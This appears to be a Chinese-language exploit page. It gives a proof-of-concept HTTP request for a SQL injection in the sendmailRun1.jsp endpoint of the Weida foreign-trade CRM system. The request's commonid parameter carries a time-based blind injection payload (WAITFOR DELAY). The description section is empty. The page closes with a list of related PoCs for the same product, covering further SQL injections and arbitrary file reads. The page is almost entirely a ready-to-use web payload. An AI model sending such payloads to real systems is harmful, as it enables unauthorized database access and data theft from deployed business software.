维达外贸客户关系管理系统 sendmailRun1.jsp SQL注入漏洞

漏洞描述

PoC代码

GET /wap/common/sendmailRun1.jsp?commonid=1%27%3BWAITFOR+DELAY+%270%3A0%3A8%27--%2Bq HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

相关漏洞推荐

• POC 维达外贸客户关系管理系统 UserView.jsp SQL注入漏洞
• 维达外贸客户关系管理系统 AccountPassword SQL注入漏洞
• 维达外贸客户关系管理系统 FileDowload 任意文件读取漏洞
• 维达外贸客户关系管理系统 LodopDown 任意文件读取漏洞
• POC 维达外贸客户关系管理系统FileDowload存在任意文件读取漏洞
• 维达外贸客户关系管理系统 AccountSelect SQL注入漏洞
• POC 维达外贸客户关系管理系统LodopDown存在任意文件读取漏洞
• 维达外贸客户关系管理系统AccountAction.jsp存在SQL注入漏洞
• 维达外贸客户关系管理系统AccountPassword.jsp存在SQL注入漏洞
• POC 维达外贸客户关系管理系统 AccountSelect 存在SQL注入漏洞
• POC 维达外贸客户关系管理系统 sendmailview.jsp存在SQL注入漏洞